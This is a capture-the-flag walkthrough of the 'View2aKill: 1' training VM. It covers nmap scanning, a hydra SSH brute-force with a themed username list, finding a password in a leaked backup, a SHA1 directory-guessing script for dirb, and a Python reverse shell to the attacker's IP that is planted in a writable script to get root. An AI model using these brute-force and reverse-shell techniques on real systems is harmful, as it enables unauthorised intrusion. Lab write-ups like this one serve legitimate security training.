"View2aKill: 1" Walktrough

Intro

This VM seems to be themed around the James Bond movie “A View to a Kill”.

Scanning

I added a view2akill host entry to my /etc/hosts.

nmap -A -P0 -p- view2akill
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-03 19:58 EST
Nmap scan report for view2akill (192.168.200.114)
Host is up (0.00079s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 54:8e:3a:14:b2:be:03:5c:d4:08:3a:ed:bb:e1:55:53 (RSA)
|   256 aa:be:cb:e1:b6:7f:47:75:29:f7:63:e5:f9:39:78:2e (ECDSA)
|_  256 de:1c:31:e0:15:4d:f5:dc:8e:bc:3c:e4:7d:64:75:54 (ED25519)
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: rain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=rain
| Subject Alternative Name: DNS:rain
| Not valid before: 2019-07-22T22:11:20
|_Not valid after:  2029-07-19T22:11:20
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
|_/joomla /zorin /dev /defense
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A View To A Kill
8191/tcp open  http    PHP cli server 5.5 or later
|_http-title: electronic controller app
MAC Address: 08:00:27:31:5B:BD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:  rain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.79 ms view2akill (192.168.200.114)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.31 seconds

That’s a lot of stuff. There seems to be a Web Server running on port 80 with a robots.txt file. That’s always useful. The index page of the regular webserver seems boring. Let’s look at the other ones:

robots.txt

User-agent: *
Disallow: /joomla
Disallow: /zorin
Disallow: /dev
Disallow: /defense

Looking at these sites, /zorin seems most interesting.

/zorin

This looks like an unfinished website. Under /zorin/hr.html we learn that this server hosts an instance of Sentrifugo under /rain/sentrifugo/. Sentrifugo seems to be abandonedware with multiple security issues in the most recent version. None of them seem to work entirely without prior authentication, but let’s keep that in mind.

Additionally we learn that the default password for new users is toor. Something else to keep in mind.

Taking a crack at ssh

With themed VMs, I like to take an OSINT approach. As that often is a good way to make educated guesses about usernames or passwords. Since we already know a possible password, we should try to brute force this. The Wikipedia page of the movie lists the following characters.

• James Bond
• Max Zorin
• Stacey Sutton
• May Day
• Godfrey Tibbett
• Scarpine
• Chuck Lee
• Carl Mortner
• Pola Ivanova
• Bob Conley
• Jenny Flex
• M
• Q
• Moneypenny
• Fredrick Gray
• Gogol
• Pan Ho
• W. G. Howe
• Kimberley Jones
• Klotkoff
• Venz
• Achille Aubergine

I created a list of possible usernames by following the following pattern illustrated using James Bond:

• james
• bond
• jamesbond
• jbond

I left the mononyms as is. This results in the following list of potential usernames:

jamesbond
jbond
james
bond
maxzorin
mzorin
max
zorin
staceysutton
ssutton
stacey
sutton
mayday
mday
may
day
godfreytibbett
gtibbett
godfrey
tibbett
scarpine
chucklee
clee
chuck
lee
carlmortner
cmortner
carl
mortner
polaivanova
pivanova
pola
ivanova
bobconley
bconley
bob
conley
jennyflex
jflex
jenny
flex
m
q
moneypenny
fredrickgray
fgray
fredrick
gray
gogol
panho
pho
pan
ho
wghowe
whowe
howe
kimberleyjones
kjones
kimberley
jones
klotkoff
venz
achilleaubergine
aaubergine
achille
aubergine

hydra -I -t4 -L potential-users.txt -p toor ssh://view2akill
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-03 20:56:55
[DATA] max 4 tasks per 1 server, overall 4 tasks, 66 login tries (l:66/p:1), ~17 tries per task
[DATA] attacking ssh://view2akill:22/
[22][ssh] host: view2akill   login: bob   password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-11-03 20:57:30

We have a hit! let’s log in:

Meet bob

Bob doesn’t seem to have a home directory of his own. Looking at the login users in /etc/passwd; I managed to guess every single one! Let’s look at what bob can read in /home/

bob@view:/$ find /home/ -type f -readable 2>/dev/null 
/home/mayday/.profile
/home/mayday/.bashrc
/home/mayday/.bash_logout
/home/max/.profile
/home/max/note.txt
/home/max/.bashrc
/home/max/.bash_logout
/home/jenny/.profile
/home/jenny/.bashrc
/home/jenny/dsktp_backup.zip
/home/jenny/.bash_logout

Oh, oooh, these people really need to learn how to manage their backups.

Let’s look what’s in the zipfile:

It contains a todo list and the password for jenny’s account. Let’s log in:

Meet jenny

The todo list mentioned something about having to finish some code. For the boss. Indeed the file /home/max/aView.py is writable by jenny. The file doesn’t seem to do much yet, but the comment states that it is invoked by a php script.

Scanning urls on port 8191

In /home/max/note.txt we find some interesting information:

Max,

The electronic controller web application you asked for is almost done. Located on port 8191 this app will allow you to execute your plan from a remote location.

The remote trigger is located in a hidden web directory that only you should know - I verbally confirmed it with you. If you do not recall, the directory is based on an algorithm:  SHA1(lowercase alpha(a-z) + "view" + digit(0-9) + digit(0-9)).

Example: SHA1(rview86) = 044c64c6964998ccb62e8facda730e8307f28de6 = http://<ip>:8191/044c64c6964998ccb62e8facda730e8307f28de6/

- Scarpine

This is probably the trigger that executes the python script we discovered. Let’s find it!

#!/usr/bin/env python3

from hashlib import sha1

prefixes = [bytes([c]) for c in range(ord('a'), ord('z') + 1)]
xs = range(10)
ys = range(10)
suffixes = [bytes(f'{x}{y}', 'ascii') for x in xs for y in ys]
names = [prefix + b'view' + suffix for prefix in prefixes for suffix in suffixes]
hashes = [sha1(n).hexdigest() for n in names]

for has in hashes:
    print(has)

Then using dirb:

dirb http://view2akill:8191 <(./gendirs.py) -z 250

-z 250 is nescessary is because the php-cli isn’t the the most performant of web servers.

On first try this yielded no result. This is because Scarpine forgot to mention that the hashed string also contains a newline character at the end as a quick test will demonstrate

echo -n rview86 | sha1sum
9722f811cb1651c20cb9bb76db720b5136824dc9  -
echo rview86 | sha1sum
044c64c6964998ccb62e8facda730e8307f28de6  -

#!/usr/bin/env python3

from hashlib import sha1

prefixes = [bytes([c]) for c in range(ord('a'), ord('z') + 1)]
xs = range(10)
ys = range(10)
suffixes = [bytes(f'{x}{y}', 'ascii') for x in xs for y in ys]
names = [prefix + b'view' + suffix + b'\n' for prefix in prefixes for suffix in suffixes]
hashes = [sha1(n).hexdigest() for n in names]

for has in hashes:
    print(has)

dirb http://view2akill:8191 <(./gendirs.py) -z 250

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Nov  3 18:04:47 2019
URL_BASE: http://view2akill:8191/
WORDLIST_FILES: /proc/self/fd/11
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 2600                                                          

---- Scanning URL: http://view2akill:8191/ ----
+ http://view2akill:8191/13fabf2bcd385cf87939748490f6a96955212567 (CODE:200|SIZE:147)
+ http://view2akill:8191/d0fa319a11ef644862edf51b9177b9d62a1e6650 (CODE:200|SIZE:133)
+ http://view2akill:8191/ece8236b92964611c75c759bb8c2297e3b962903 (CODE:200|SIZE:119)
+ http://view2akill:8191/7f98ca7ba1484c66bf09627f931448053ae6b55a (CODE:200|SIZE:815)
+ http://view2akill:8191/fa05b73405e2996c69ad78ed1fa0f24b9da965ac (CODE:200|SIZE:119)
+ http://view2akill:8191/af92fb801e526655686899ae8341b9e7cfa21ea0 (CODE:200|SIZE:119)
+ http://view2akill:8191/f871c18649e03d2e9cd7414b95cde578f23dba8d (CODE:200|SIZE:147)
+ http://view2akill:8191/0f3c6dc226621deac4d0a66e0f60785d923fc282 (CODE:200|SIZE:119)
+ http://view2akill:8191/03388bdd6c0ba6a112b0f0d3aca2f3775be0a007 (CODE:200|SIZE:119)
+ http://view2akill:8191/ef1cacc0f3b5aea1a0d56c5df4263580e7b23570 (CODE:200|SIZE:133)
+ http://view2akill:8191/e57019d9886a12e8c27d9d3f4e46fac9603e8bc2 (CODE:200|SIZE:147)
+ http://view2akill:8191/de5eb20114e281e2e514a64d98187d6f30c3c9b4 (CODE:200|SIZE:119)
+ http://view2akill:8191/e7642454c8c6047fd883a859580a0723657fcf45 (CODE:200|SIZE:115)
+ http://view2akill:8191/ad3029ea9d74ebcbde60ec9abaf95ac6eed95490 (CODE:200|SIZE:119)
+ http://view2akill:8191/5a96f2b44b310535334d2b99258db5ea3eadd448 (CODE:200|SIZE:147)
+ http://view2akill:8191/dd0cdfeb376f8e96d2325724eb000588c8cf70f5 (CODE:200|SIZE:119)
+ http://view2akill:8191/d7297045329f04a3bb4b35e629407343868820d4 (CODE:200|SIZE:147)
+ http://view2akill:8191/72fd79c962996b32fc4b0a2a0c5c1b6b1aa860d4 (CODE:200|SIZE:119)
+ http://view2akill:8191/8eb11aa78f52090f8c32f81797e561d7fbd29fd7 (CODE:200|SIZE:147)
+ http://view2akill:8191/f174b138d930be79ab383669319aecbdde70af6a (CODE:200|SIZE:119)
+ http://view2akill:8191/2cfc36dfe3e7f20faa2ad9bc2091c25387844adf (CODE:200|SIZE:133)
+ http://view2akill:8191/7c7b00a0a30137eaac46b32aaec2f9668d6a10d5 (CODE:200|SIZE:119)
                                                                               
-----------------
END_TIME: Sun Nov  3 18:15:50 2019
DOWNLOADED: 2600 - FOUND: 22

Trying all, the correct url is http://view2akill:8191/7f98ca7ba1484c66bf09627f931448053ae6b55a.

Clicking on the button we see the same text as in aView.py.

Getting root

If we modify aView.py we can easily create a reverse shell:

#!/usr/bin/python
# 
# executed from php app add final wrapper/scirpt here
import socket, subprocess, os

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.200.113", 1234))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

p = subprocess.call(["/bin/sh", "-i"])

Flag

The flag is the executable /root/flag/run_me_for_flag.sh. If we run it we get the following screen:

Conclusion

It seems I skipped a large part of this VM by enumerating possible usernames using the theme. In some themed VMs this is the only way to progress and here it seems that the author didn’t intend for this.